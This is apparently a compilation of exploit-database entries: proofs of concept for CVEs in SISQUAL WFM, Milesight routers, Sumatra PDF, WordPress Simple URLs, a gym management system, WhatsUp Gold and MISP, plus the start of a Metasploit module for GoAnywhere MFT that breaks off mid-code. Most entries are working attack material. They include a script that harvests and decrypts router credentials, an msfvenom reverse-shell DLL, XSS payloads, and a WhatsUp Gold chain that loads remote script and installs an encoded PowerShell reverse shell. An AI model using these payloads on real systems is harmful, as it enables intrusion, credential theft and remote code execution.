<pre><code># Exploit Title: SISQUAL WFM 7.1.319.103 Host Header Injection<br /># Discovered Date: 17/03/2023<br /># Reported Date: 17/03/2023<br /># Exploit Author: Omer Shaik (unknown_exploit)<br /># Vendor Homepage: https://www.sisqualwfm.com<br /># Version: 7.1.319.103<br /># Tested on: SISQUAL WFM 7.1.319.103<br /># Affected Version: sisqualWFM - 7.1.319.103<br /># Fixed Version: sisqualWFM - 7.1.319.111<br /># CVE : CVE-2023-36085<br /># CVSS: 3.1 (AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N)<br /># Category: Web Apps<br /># Reference: https://github.com/omershaik0/Handmade_Exploits/tree/main/SISQUALWFM-Host-Header-Injection-CVE-2023-36085<br /><br /><br /><br />A proof-of-concept(POC) scenario that demonstrates a potential host header injection vulnerability in sisqualWFM version 7.1.319.103, specifically targeting the /sisqualIdentityServer/core endpoint. This vulnerability could be exploited by an attacker to manipulate webpage links or redirect users to another site with ease, simply by tampering with the host header.<br /><br />****************************************************************************************************<br />Orignal Request<br />****************************************************************************************************<br />GET /sisqualIdentityServer/core/login HTTP/2<br />Host: sisqualwfm.cloud<br />Cookie:<cookie><br />Sec-Ch-Ua: "Not A(Brand";v="24", "Chromium";v="110"<br />Sec-Ch-Ua-Mobile: ?0<br />Sec-Ch-Ua-Platform: "Linux"<br />Upgrade-Insecure-Requests: 1<br />User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.5481.78 Safari/537.36<br />Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7<br />Sec-Fetch-Site: none<br />Sec-Fetch-Mode: navigate<br />Sec-Fetch-User: ?1<br />Sec-Fetch-Dest: document<br />Accept-Encoding: gzip, deflate<br />Accept-Language: en-US,en;q=0.9<br /><br />****************************************************************************************************<br />Orignal Response<br />****************************************************************************************************<br />HTTP/2 302 Found<br />Cache-Control: no-store, no-cache, must-revalidate<br />Location: https://sisqualwfm.cloud/sisqualIdentityServer/core/<br />Strict-Transport-Security: max-age=31536000; includeSubDomains; preload<br />X-Content-Type-Options: nosniff<br />X-Frame-Options: sameorigin<br />Date: Wed, 22 Mar 2023 13:22:10 GMT<br />Content-Length: 0<br />****************************************************************************************************<br /><br /><br /><br /><br />██████╗ ██████╗ ██████╗<br />██╔══██╗██╔═══██╗██╔════╝<br />██████╔╝██║ ██║██║ <br />██╔═══╝ ██║ ██║██║ <br />██║ ╚██████╔╝╚██████╗<br />╚═╝ ╚═════╝ ╚═════╝<br /> <br /><br /><br /><br />****************************************************************************************************<br />Request has been modified to redirect user to evil.com (Intercepted request using Burp proxy)<br />****************************************************************************************************<br />GET /sisqualIdentityServer/core/login HTTP/2<br />Host: evil.com<br />Cookie:<cookie><br />Sec-Ch-Ua: "Not A(Brand";v="24", "Chromium";v="110"<br />Sec-Ch-Ua-Mobile: ?0<br />Sec-Ch-Ua-Platform: "Linux"<br />Upgrade-Insecure-Requests: 1<br />User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.5481.78 Safari/537.36<br />Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7<br />Sec-Fetch-Site: none<br />Sec-Fetch-Mode: navigate<br />Sec-Fetch-User: ?1<br />Sec-Fetch-Dest: document<br />Accept-Encoding: gzip, deflate<br />Accept-Language: en-US,en;q=0.9<br /><br />****************************************************************************************************<br />Response<br />****************************************************************************************************<br />HTTP/2 302 Found<br />Cache-Control: no-store, no-cache, must-revalidate<br />Location: https://evil.com/sisqualIdentityServer/core/<br />Strict-Transport-Security: max-age=31536000; includeSubDomains; preload<br />X-Content-Type-Options: nosniff<br />X-Frame-Options: sameorigin<br />Content-Length: 0<br /><br /><br />****************************************************************************************************<br />Method of Attack<br />****************************************************************************************************<br /><br />curl -k --header "Host: attack.host.com" "Domain Name + /sisqualIdentityServer/core" -vvv<br /><br />****************************************************************************************************<br /></code></pre>
<pre><code>#!/usr/bin/env python3<br /># -*- coding: utf-8 -*-<br /><br />"""<br />Title: Credential Leakage Through Unprotected System Logs and Weak Password Encryption<br />CVE: CVE-2023-43261<br />Script Author: Bipin Jitiya (@win3zz)<br />Vendor: Milesight IoT - https://www.milesight-iot.com/ (Formerly Xiamen Ursalink Technology Co., Ltd.)<br />Software/Hardware: UR5X, UR32L, UR32, UR35, UR41 and there might be other Industrial Cellular Router could also be vulnerable.<br />Script Tested on: Ubuntu 20.04.6 LTS with Python 3.8.10<br />Writeup: https://medium.com/@win3zz/inside-the-router-how-i-accessed-industrial-routers-and-reported-the-flaws-29c34213dfdf<br />"""<br /><br />import sys<br />import requests<br />import re<br />import warnings<br />from Crypto.Cipher import AES # pip install pycryptodome<br />from Crypto.Util.Padding import unpad<br />import base64<br />import time<br /><br />warnings.filterwarnings("ignore")<br /><br />KEY = b'1111111111111111'<br />IV = b'2222222222222222'<br /><br />def decrypt_password(password):<br /> try:<br /> return unpad(AES.new(KEY, AES.MODE_CBC, IV).decrypt(base64.b64decode(password)), AES.block_size).decode('utf-8')<br /> except ValueError as e:<br /> display_output(' [-] Error occurred during password decryption: ' + str(e), 'red')<br /><br />def display_output(message, color):<br /> colors = {'red': '\033[91m', 'green': '\033[92m', 'blue': '\033[94m', 'yellow': '\033[93m', 'cyan': '\033[96m', 'end': '\033[0m'}<br /> print(f"{colors[color]}{message}{colors['end']}")<br /> time.sleep(0.5)<br /><br />urls = []<br /><br />if len(sys.argv) == 2:<br /> urls.append(sys.argv[1])<br /><br />if len(sys.argv) == 3 and sys.argv[1] == '-f':<br /> with open(sys.argv[2], 'r') as file:<br /> urls.extend(file.read().splitlines())<br /><br />if len(urls) == 0:<br /> display_output('Please provide a URL or a file with a list of URLs.', 'red')<br /> display_output('Example: python3 ' + sys.argv[0] + ' https://example.com', 'blue')<br /> display_output('Example: python3 ' + sys.argv[0] + ' -f urls.txt', 'blue')<br /> sys.exit()<br /><br />use_proxy = False<br />proxies = {'http': 'http://127.0.0.1:8080/'} if use_proxy else None<br /><br />for url in urls:<br /> display_output('[*] Initiating data retrieval for: ' + url + '/lang/log/httpd.log', 'blue')<br /> response = requests.get(url + '/lang/log/httpd.log', proxies=proxies, verify=False)<br /><br /> if response.status_code == 200:<br /> display_output('[+] Data retrieval successful for: ' + url + '/lang/log/httpd.log', 'green')<br /> data = response.text<br /> credentials = set(re.findall(r'"username":"(.*?)","password":"(.*?)"', data))<br /><br /> num_credentials = len(credentials)<br /> display_output(f'[+] Found {num_credentials} unique credentials for: ' + url, 'green')<br /><br /> if num_credentials > 0:<br /> display_output('[+] Login page: ' + url + '/login.html', 'green')<br /> display_output('[*] Extracting and decrypting credentials for: ' + url, 'blue')<br /> display_output('[+] Unique Credentials:', 'yellow')<br /> for i, (username, password) in enumerate(credentials, start=1):<br /> display_output(f' Credential {i}:', 'cyan')<br /> decrypted_password = decrypt_password(password.encode('utf-8'))<br /> display_output(f' - Username: {username}', 'green')<br /> display_output(f' - Password: {decrypted_password}', 'green')<br /> else:<br /> display_output('[-] No credentials found in the retrieved data for: ' + url, 'red')<br /> else:<br /> display_output('[-] Data retrieval failed. Please check the URL: ' + url, 'red')<br /> <br /><br /></code></pre>
<pre><code># Exploit Title: Sumatra PDF 3.5.2 DLL Hijacking<br /># Date: 06.02.2024<br /># Exploit Author: Ravishanka Silva<br /># Vendor Homepage: https://www.sumatrapdfreader.org/free-pdf-reader<br /># Software Link: https://www.sumatrapdfreader.org/download-free-pdf-viewer<br /># Version: 3.5.2<br /># Tested on: Windows 10, Windows 11<br /># CVE : CVE-2024-24528<br /><br />Description:<br />Sumatra PDF is a free and open-source document viewer for Windows. It is a lightweight and minimalistic application designed to quickly and efficiently view PDF, eBook (ePub, Mobi), XPS, DjVu, CHM, and comic book (CBZ and CBR) files.<br />Key features of Sumatra PDF include its fast startup and rendering speed, support for a variety of document formats, and a user-friendly interface. While it may not have all the advanced features found in some other PDF viewers, Sumatra PDF is a popular choice for users who prioritize speed and simplicity in a document viewer.<br /><br />A DLL Hijacking vulnerability exists in Sumatra PDF Version 3.5.2 which allows a local attacker to execute arbitrary code and obtain a certain level of persistence on the compromised host, in the context of current logged-in user, by placing a crafted DLL in the installation directory, resulting in the hijacking of the following DLL files: <br />dbgcore.DLL<br />profapi.dll<br />PROPSYS.dll<br />TextShaping.dll<br />DWrite.dll<br /><br />Proof of Concept:<br /><br />1. Create a malicious .dll file via msfvenom,<br />msfvenom -p windows/x64/shell_reverse_tcp LHOST=<IP> LPORT=7777 -f dll -o dbgcore.DLL<br /><br />2. Place the malicious DLL inside the Sumatra PDF installation folder. (Usually "C:\Users\<username>\AppData\Local\SumatraPDF")<br /><br />3. Start a listener via nc,<br />nc -lvp 7777<br /><br />4. Open Sumatra PDF application, and observe the execution of the reverse shell.<br /><br />Demo:<br />https://drive.google.com/file/d/1-OMJ0ZvR9TYJEg_AwspRcGEAQvOLHJ41/view?usp=sharing<br /></code></pre>
<pre><code># Exploit Title: simple urls < 115 XSS<br /># Google Dork:<br /># Exploit Author: AmirZargham<br /># Vendor Homepage: https://getlasso.co/<br /># Software Link: https://wordpress.org/plugins/simple-urls/<br /># Version: < 115<br /># Tested on: firefox,chrome<br /># CVE: CVE-2023-0099<br /># CWE: CWE-79<br /># Platform: MULTIPLE<br /># Type: WebApps<br /><br /><br />Description<br />The Simple URLs WordPress plugin before 115 does not sanitise and escape<br />some parameters before outputting them back in some pages, leading to<br />Reflected Cross-Site Scripting.<br /><br /><br />Usage Info:<br /><br />send malicious link to victim:<br />https://vulnerable.com/wp-content/plugins/simple-urls/admin/assets/js/import-js.php?search=<br /><script>alert(origin)</script><br /><br /></code></pre>
<pre><code># Exploit Title: GYM MS - GYM Management System - Cross Site Scripting (Stored)<br /># Date: 29/09/2023<br /># Vendor Homepage: https://phpgurukul.com/gym-management-system-using-php-and-mysql/<br /># Software Link: https://phpgurukul.com/projects/GYM-Management-System-using-PHP.zip<br /># Version: 1.0<br /># Last Update: 31 August 2022<br /># Tested On: Kali Linux 6.1.27-1kali1 (2023-05-12) x86_64 + XAMPP 7.4.30<br /><br /># 1: Create user, login and go to profile.php<br /><br /># 2: Use payload x%22%20onmouseover%3Dalert%28document.cookie%29%20x%3D%22 in lname field.<br /><br /># 3: When entering the profile.php page, document.cookie will be reflected every time.<br /><br /># Author<br />This vulnerability was detected by Alperen Yozgat while testing with the Rapplex - Web Application Security Scanner.<br /><br /># About Rapplex<br />Rapplex is a web applicaton security scanner that scans and reports vulnerabilities in websites.<br />Pentesters can use it as an automation tool for daily tasks but "Pentester Studio" will provide such a great addition as well in their manual assessments.<br />So, the software does not need separate development tools to discover different types of vulnerabilities or to develop existing engines. <br />"Exploit" tools are available to take advantage of vulnerabilities such as SQL Injection, Code Injection, Fle Incluson.<br /><br /><br /># HTTP Request <br /><br />POST /gym/profile.php HTTP/1.1<br />Host: localhost<br />Content-Length: 129<br />Content-Type: application/x-www-form-urlencoded<br />User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/113.0.5672.93 Safari/537.36<br />Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7<br />Cookie: PHPSESSID=76e2048c174c1a5d46e203df87672c25 #CHANGE<br />Connection: close<br /><br />fname=test&lname=x%22%20onmouseover%3Dalert%28document.cookie%29%20x%3D%22&email=john%40test.com&mobile=1425635241&state=Delhi&city=New+Delhi&address=ABC+Street+XYZ+Colony&submit=Update<br /> <br /><br /></code></pre>
<pre><code># Exploit Title: WhatsUpGold 22.1.0 - Stored Cross-Site Scripting (XSS)<br /># Date: April 18, 2023<br /># Exploit Author: Andreas Finstad (4ndr34z)<br /># Vendor Homepage: https://www.whatsupgold.com<br /># Version: v.22.1.0 Build 39<br /># Tested on: Windows 2022 Server<br /># CVE : CVE-2023-35759<br /># Reference: https://nvd.nist.gov/vuln/detail/CVE-2023-35759<br /><br /><br /><br />WhatsUp Gold 2022 (22.1.0 Build 39) <br /><br />Stored XSS in sysName SNMP parameter.<br /><br /><br />Vulnerability Report: Stored XSS in WhatsUp Gold 2022 (22.1.0 Build 39)<br />Product Name: WhatsUp Gold 2022<br />Version: 22.1.0 Build 39<br />Vulnerability Type: Stored Cross-Site Scripting (XSS)<br /><br />Description:<br />WhatsUp Gold 2022 is vulnerable to a stored cross-site scripting (XSS) attack that allows an attacker to inject malicious scripts into the admin console. The vulnerability exists in the sysName SNMP field on a device, which reflects the input from the SNMP device into the admin console after being discovered by SNMP.<br /> <br />An attacker can exploit this vulnerability by crafting a specially crafted SNMP device name that contains malicious code. Once the device name is saved and reflected in the admin console, the injected code will execute in the context of the admin user, potentially allowing the attacker to steal sensitive data or perform unauthorized actions.<br /><br />As there is no CSRF tokens or CDP, it is trivial to create a javascript payload that adds an scheduled action on the server, that executes code as "NT System". In my POC code, I add a Powershell revshell that connects out to the attacker every 5 minutes. (screenshot3)<br /><br />The XSS trigger when clicking the "All names and addresses"<br /><br />Stage:<br /><br />Base64 encoded id property:<br />var a=document.createElement("script");a.src="https://f20.be/t.js";document.body.appendChild(a);<br /><br />Staged payload placed in the SNMP sysName Field on a device:<br /><img id=dmFyIGE9ZG9jdW1lbnQuY3JlYXRlRWxlbWVudCgic2NyaXB0Iik7YS5zcmM9Imh0dHBzOi8vZjIwLmJlL3QuanMiO2RvY3VtZW50LmJvZHkuYXBwZW5kQ2hpbGQoYSk7Cg== src=https://f20.be/1 onload=eval(atob(this.id))><br /><br />payload:<br /><br />var vhost = window.location.protocol+'\/\/'+window.location.host<br /><br />addaction();<br />async function addaction() {<br />var arguments = ''<br />let run = fetch(vhost+'/NmConsole/api/core/WugPowerShellScriptAction?_dc=1655327281064',{<br /> method: 'POST',<br /> headers: {<br /> 'Connection': 'close',<br /> 'Content-Length': '1902',<br /> 'sec-ch-ua': '" Not A;Brand";v="99", "Chromium";v="102", "Microsoft Edge";v="102"',<br /> 'Accept': 'application/json',<br /> 'Content-Type': 'application/json',<br /> 'X-Requested-With': 'XMLHttpRequest',<br /> 'sec-ch-ua-mobile': '?0',<br /> 'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/102.0.5005.63 Safari/537.36 Edg/102.0.1245.33',<br /> 'sec-ch-ua-platform': '"macOS"',<br /> 'Sec-Fetch-Mode': 'cors',<br /> 'Sec-Fetch-Dest': 'empty',<br /> 'Accept-Encoding': 'gzip, deflate',<br /> 'Accept-Language': 'nb,no;q=0.9,en;q=0.8,en-GB;q=0.7,en-US;q=0.6,sv;q=0.5,fr;q=0.4'<br /> },<br /> credentials: 'include',<br /> body: '{"id":-1,"Timeout":30,"ScriptText":"Start-process powershell -argumentlist \\"-W Hidden -noprofile -executionpolicy bypass -NoExit -e JAB0AG0AcAAgAD0AIABAACgAJwBzAFkAUwB0AGUATQAuAG4ARQB0AC4AcwBPAGMAJwAsACcASwBFAHQAcwAuAHQAQwBQAEMAbABJAGUAbgB0ACcAKQA7ACQAdABtAHAAMgAgAD0AIABbAFMAdAByAGkAbgBnAF0AOgA6AEoAbwBpAG4AKAAnACcALAAkAHQAbQBwACkAOwAkAGMAbABpAGUAbgB0ACAAPQAgAE4AZQB3AC0ATwBiAGoAZQBjAHQAIAAkAHQAbQBwADIAKAAnADEAOQAyAC4AMQA2ADgALgAxADYALgAzADUAJwAsADQANAA0ADQAKQA7ACQAcwB0AHIAZQBhAG0AIAA9ACAAJABjAGwAaQBlAG4AdAAuAEcAZQB0AFMAdAByAGUAYQBtACgAKQA7AFsAYgB5AHQAZQBbAF0AXQAkAGIAeQB0AGUAcwAgAD0AIAAwAC4ALgA2ADUANQAzADUAfAAlAHsAMAB9ADsAdwBoAGkAbABlACgAKAAkAGkAIAA9ACAAJABzAHQAcgBlAGEAbQAuAFIAZQBhAGQAKAAkAGIAeQB0AGUAcwAsACAAMAAsACAAJABiAHkAdABlAHMALgBMAGUAbgBnAHQAaAApACkAIAAtAG4AZQAgADAAKQB7ADsAJABkAGEAdABhACAAPQAgACgATgBlAHcALQBPAGIAagBlAGMAdAAgAC0AVAB5AHAAZQBOAGEAbQBlACAAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4AQQBTAEMASQBJAEUAbgBjAG8AZABpAG4AZwApAC4ARwBlAHQAUwB0AHIAaQBuAGcAKAAkAGIAeQB0AGUAcwAsADAALAAgACQAaQApADsAJABzAGUAbgBkAGIAYQBjAGsAIAA9ACAAKABpAGUAeAAgACQAZABhAHQAYQAgADIAPgAmADEAIAB8ACAATwB1AHQALQBTAHQAcgBpAG4AZwAgACkAOwAkAHMAZQBuAGQAYgBhAGMAawAyACAAPQAgACQAcwBlAG4AZABiAGEAYwBrACAAKwAgACgAJABlAG4AdgA6AFUAcwBlAHIATgBhAG0AZQApACAAKwAgACcAQAAnACAAKwAgACgAJABlAG4AdgA6AFUAcwBlAHIARABvAG0AYQBpAG4AKQAgACsAIAAoAFsAUwB5AHMAdABlAG0ALgBFAG4AdgBpAHIAbwBuAG0AZQBuAHQAXQA6ADoATgBlAHcATABpAG4AZQApACAAKwAgACgAZwBlAHQALQBsAG8AYwBhAHQAaQBvAG4AKQArACcAPgAnADsAJABzAGUAbgBkAGIAeQB0AGUAIAA9ACAAKABbAHQAZQB4AHQALgBlAG4AYwBvAGQAaQBuAGcAXQA6ADoAQQBTAEMASQBJACkALgBHAGUAdABCAHkAdABlAHMAKAAkAHMAZQBuAGQAYgBhAGMAawAyACkAOwAkAHMAdAByAGUAYQBtAC4AVwByAGkAdABlACgAJABzAGUAbgBkAGIAeQB0AGUALAAwACwAJABzAGUAbgBkAGIAeQB0AGUALgBMAGUAbgBnAHQAaAApADsAJABzAHQAcgBlAGEAbQAuAEYAbAB1AHMAaAAoACkAfQA7ACQAYwBsAGkAZQBuAHQALgBDAGwAbwBzAGUAKAApAA==\\" -NoNewWindow","ScriptImpersonateFlag":false,"ClsId":"5903a09a-cce6-11e0-8f66-fe544824019b","Description":"Evil script","Name":"Systemtask"}'<br />});<br /><br /><br />setTimeout(() => { getactions(); }, 1000);<br /><br />};<br /><br /><br /><br />async function getactions() {<br /><br />const response = await fetch(vhost+'/NmConsole/api/core/WugAction?_dc=4',{<br /> method: 'GET',<br /> headers: {<br /> 'Connection': 'close', <br /> 'sec-ch-ua': '" Not A;Brand";v="99", "Chromium";v="102", "Microsoft Edge";v="102"', <br /> 'Accept': 'application/json', <br /> 'Content-Type': 'application/json', <br /> 'X-Requested-With': 'XMLHttpRequest', <br /> 'sec-ch-ua-mobile': '?0', <br /> 'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/102.0.5005.63 Safari/537.36 Edg/102.0.1245.33', <br /> 'sec-ch-ua-platform': '"macOS"', <br /> 'Sec-Fetch-Site': 'same-origin', <br /> 'Sec-Fetch-Mode': 'cors', <br /> 'Sec-Fetch-Dest': 'empty', <br /> 'Accept-Encoding': 'gzip, deflate', <br /> 'Accept-Language': 'nb,no;q=0.9,en;q=0.8,en-GB;q=0.7,en-US;q=0.6,sv;q=0.5,fr;q=0.4'<br /> },<br /> credentials: 'include'<br /> <br />});<br />const actions = await response.json();<br />var results = [];<br />var searchField = "Name";<br />var searchVal = "Systemtask";<br />for (var i=0 ; i < actions.length ; i++)<br />{<br /> if (actions[i][searchField] == searchVal) {<br /> results.push(actions[i].Id);<br /> revshell(results[0])<br /> <br /> }<br />}<br />//console.log(actions);<br /><br />};<br /><br /><br />async function revshell(ID) {<br />fetch(vhost+'/NmConsole/Configuration/DlgRecurringActionLibrary/DlgSchedule/DlgSchedule.asp',{<br /> method: 'POST',<br /> headers: {<br /> 'Connection': 'close',<br /> 'Content-Length': '2442',<br /> 'Cache-Control': 'max-age=0',<br /> 'sec-ch-ua': '" Not A;Brand";v="99", "Chromium";v="102", "Microsoft Edge";v="102"',<br /> 'sec-ch-ua-mobile': '?0',<br /> 'sec-ch-ua-platform': '"macOS"',<br /> 'Upgrade-Insecure-Requests': '1',<br /> 'Origin': 'https://192.168.16.100',<br /> 'Content-Type': 'application/x-www-form-urlencoded',<br /> 'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/102.0.5005.63 Safari/537.36 Edg/102.0.1245.33',<br /> 'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9',<br /> 'Sec-Fetch-Site': 'same-origin',<br /> 'Sec-Fetch-Mode': 'navigate',<br /> 'Sec-Fetch-User': '?1',<br /> 'Sec-Fetch-Dest': 'iframe',<br /> 'Referer': 'https://192.168.16.100/NmConsole/Configuration/DlgRecurringActionLibrary/DlgSchedule/DlgSchedule.asp',<br /> 'Accept-Encoding': 'gzip, deflate',<br /> 'Accept-Language': 'nb,no;q=0.9,en;q=0.8,en-GB;q=0.7,en-US;q=0.6,sv;q=0.5,fr;q=0.4'<br /> },<br /> credentials: 'include',<br /> body: 'DlgSchedule.oCheckBoxEnableSchedule=on&DlgSchedule.ScheduleType=DlgSchedule.oRadioButtonInterval&DlgSchedule.oEditIntervalMinutes=5&ShowAspFormDialog.VISITEDFORM=visited&DlgRecurringActionGeneral.oEditName=test&DlgRecurringActionGeneral.oComboSelectActionType=21&DlgRecurringActionGeneral.DIALOGRETURNURL=%2FNmConsole%2F%24Nm%2FCore%2FForm-AspForms%2Finc%2FShowAspFormDialog.asp&DlgRecurringActionGeneral.SAVEDFORMSTATE=%253cSavedFormState%253e%253cFormVariables%253e%253coElement%2520sName%3D%2522__VIEWSTATE%2522%2520sValue%3D%2522%25253cViewState%2F%25253e%0D%0A%2522%2F%253e%253c%2FFormVariables%253e%253cQueryStringVariables%2F%253e%253c%2FSavedFormState%253e&DlgRecurringActionGeneral.VISITEDFORM=visited%2C+visited&DlgSchedule.DIALOGRETURNURL=%2FNmConsole%2F%24Nm%2FCore%2FForm-AspForms%2Finc%2FShowAspFormDialog.asp&DlgSchedule.SAVEDFORMSTATE=%253cSavedFormState%253e%253cFormVariables%253e%253coElement%2520sName%3D%2522__VIEWSTATE%2522%2520sValue%3D%2522%25253cViewState%2F%25253e%0D%0A%2522%2F%253e%253c%2FFormVariables%253e%253cQueryStringVariables%2F%253e%253c%2FSavedFormState%253e&__EVENTTYPE=ButtonPressed&__EVENTTARGET=DlgSchedule.oButtonFinish&__EVENTARGUMENT=&DlgSchedule.VISITEDFORM=visited&__SOURCEFORM=DlgSchedule&__VIEWSTATE=%253cViewState%253e%253coElement%2520sName%3D%2522DlgRecurringActionGeneral.RecurringAction-sMode%2522%2520sValue%3D%2522new%2522%2F%253e%253coElement%2520sName%3D%2522RecurringAction-nActionTypeID%2522%2520sValue%3D%2522'+ID+'%2522%2F%253e%253coElement%2520sName%3D%2522Date_nStartOfWeek%2522%2520sValue%3D%25220%2522%2F%253e%253coElement%2520sName%3D%2522Date_sMediumDateFormat%2522%2520sValue%3D%2522MMMM%2520dd%2C%2520yyyy%2522%2F%253e%253coElement%2520sName%3D%2522DlgSchedule.sWebUserName%2522%2520sValue%3D%2522admin%2522%2F%253e%253coElement%2520sName%3D%2522DlgRecurringActionGeneral.sWebUserName%2522%2520sValue%3D%2522admin%2522%2F%253e%253coElement%2520sName%3D%2522DlgSchedule.RecurringAction-sMode%2522%2520sValue%3D%2522new%2522%2F%253e%253coElement%2520sName%3D%2522RecurringAction-sName%2522%2520sValue%3D%2522test%2522%2F%253e%253coElement%2520sName%3D%2522Date_bIs24HourTime%2522%2520sValue%3D%25220%2522%2F%253e%253c%2FViewState%253e%0D%0A&DlgSchedule.oEditDay=&DlgSchedule.oComboSelectMonthHour=0&DlgSchedule.oComboSelectMonthMinute=0&DlgSchedule.oComboSelectMonthAmPm=0&DlgSchedule.oComboSelectWeekHour=0&DlgSchedule.oComboSelectWeekMinute=0&DlgSchedule.oComboSelectWeekAmPm=0'<br />});<br />};<br /><br /></code></pre>
<pre><code># Exploit Title: MISP 2.4.171 Stored XSS [CVE-2023-37307] (Authenticated)<br /># Date: 8th October 2023<br /># Exploit Author: Mücahit Çeri<br /># Vendor Homepage: https://www.circl.lu/<br /># Software Link: https://github.com/MISP/MISP<br /># Version: 2.4.171<br /># Tested on: Ubuntu 20.04<br /># CVE : CVE-2023-37307<br /><br /># Exploit:<br />Logged in as low privileged account<br /><br />1)Click on the "Galaxies" button in the top menu<br />2)Click "Add Cluster" in the left menu.<br />3)Enter the payload "</title><script>alert(1)</script>" in the Name parameter.<br />4)Other fields are filled randomly. Click on Submit button.<br />5)When the relevant cluster is displayed, we see that alert(1) is running<br /><br /></code></pre>
<pre><code>##<br /># This module requires Metasploit: https://metasploit.com/download<br /># Current source: https://github.com/rapid7/metasploit-framework<br />##<br /><br />class MetasploitModule < Msf::Exploit::Remote<br /> Rank = ExcellentRanking<br /><br /> include Msf::Exploit::Remote::HttpClient<br /> prepend Msf::Exploit::Remote::AutoCheck<br /> include Msf::Exploit::FileDropper<br /> include Msf::Auxiliary::Report<br /><br /> def initialize(info = {})<br /> super(<br /> update_info(<br /> info,<br /> 'Name' => 'Fortra GoAnywhere MFT Unauthenticated Remote Code Execution',<br /> 'Description' => %q{<br /> This module exploits a vulnerability in Fortra GoAnywhere MFT that allows an unauthenticated attacker to<br /> create a new administrator account. This can be leveraged to upload a JSP payload and achieve RCE. GoAnywhere<br /> MFT versions 6.x from 6.0.1, and 7.x before 7.4.1 are vulnerable.<br /> },<br /> 'License' => MSF_LICENSE,<br /> 'Author' => [<br /> 'sfewer-r7', # MSF RCE Exploit<br /> 'James Horseman', # Original auth bypass PoC/Analysis<br /> 'Zach Hanley' # Original auth bypass PoC/Analysis<br /> ],<br /> 'References' => [<br /> ['CVE', '2024-0204'],<br /> ['URL', 'https://www.fortra.com/security/advisory/fi-2024-001'], # Vendor Advisory<br /> ['URL', 'https://www.horizon3.ai/cve-2024-0204-fortra-goanywhere-mft-authentication-bypass-deep-dive/']<br /> ],<br /> 'DisclosureDate' => '2024-01-22',<br /> 'Platform' => %w[linux win],<br /> 'Arch' => [ARCH_JAVA],<br /> 'Privileged' => true, # Could be 'NT AUTHORITY\SYSTEM' on Windows, or a non-root user 'gamft' on Linux.<br /> 'Targets' => [<br /> [<br /> # Tested on GoAnywhere 7.4.0 with the payload java/jsp_shell_reverse_tcp<br /> 'Automatic', {}<br /> ],<br /> [<br /> 'Linux',<br /> {<br /> 'Platform' => 'linux',<br /> 'GOANYWHERE_INSTALL_PATH' => '/opt/HelpSystems/GoAnywhere'<br /> }<br /> ],<br /> [<br /> 'Windows',<br /> {<br /> 'Platform' => 'win',<br /> 'GOANYWHERE_INSTALL_PATH' => 'C:\\Program Files\\Fortra\\GoAnywhere\\'<br /> },<br /> ],<br /> ],<br /> 'DefaultOptions' => {<br /> 'RPORT' => 8001,<br /> 'SSL' => true<br /> },<br /> 'DefaultTarget' => 0,<br /> 'Notes' => {<br /> 'Stability' => [CRASH_SAFE],<br /> 'Reliability' => [REPEATABLE_SESSION],<br /> 'SideEffects' => [<br /> IOC_IN_LOGS,<br /> # A new admin account is created, which the exploit can't destroy.<br /> CONFIG_CHANGES,<br /> # The upload may leave payload artifacts if the FileDropper mixins cleanup handlers cannot delete them.<br /> ARTIFACTS_ON_DISK<br /> ]<br /> }<br /> )<br /> )<br /><br /> register_options(<br /> [<br /> OptString.new('TARGETURI', [true, 'The base path to the web application', '/goanywhere/']),<br /> ]<br /> )<br /> end<br /><br /> def check<br /> # We can query an undocumented unauthenticated REST API endpoint and pull the version number.<br /> res = send_request_cgi(<br /> 'method' => 'GET',<br /> 'uri' => normalize_uri(target_uri.path, '/rest/gacmd/v1/system')<br /> )<br /><br /> return CheckCode::Unknown('Connection failed') unless res<br /><br /> return CheckCode::Unknown("Received unexpected HTTP status code: #{res.code}.") unless res.code == 200<br /><br /> json_data = res.get_json_document<br /><br /> product = json_data.dig('data', 'product')<br /><br /> version = json_data.dig('data', 'version')<br /><br /> return CheckCode::Unknown('No version information in response') if product.nil? || version.nil?<br /><br /> # As per the Fortra advisory, the following version are affected:<br /> # * Fortra GoAnywhere MFT 6.x from 6.0.1<br /> # * Fortra GoAnywhere MFT 7.x before 7.4.1<br /> # This seems to imply version 6.0.1 through to 7.4.0 (inclusive) are vulnerable.<br /> if Rex::Version.new(version).between?(Rex::Version.new('6.0.1'), Rex::Version.new('7.4.0'))<br /> return CheckCode::Appears("#{product} #{version}")<br /> end<br /><br /> Exploit::CheckCode::Safe("#{product} #{version}")<br /> end<br /><br /> def exploit<br /> # CVE-2024-0204 allows an unauthenticated attacker to create a new administrator account on the target system. So<br /> # we generate the username/password pair we want to use.<br /> # Note: We cannot delete the administrator account that we create.<br /> admin_username = Rex::Text.rand_text_alpha_lower(8)<br /> admin_password = Rex::Text.rand_text_alphanumeric(16)<br /><br /> # By using a double dot path segment with a semicolon in it, we can bypass the servers attempts to block access to<br /> # the /wizard/InitialAccountSetup.xhtml endpoint that allows new admin account creation. As we leverage a double<br /> # dot path segment, we need a directory to navigate down from, there are many available on the target so we pick<br /> # a random one that we know works.<br /> path_segments = %w[styles fonts auth help]<br /><br /> path_segment = path_segments.sample<br /><br /> # This is CVE-2024-0204...<br /> initialaccountsetup_endpoint = 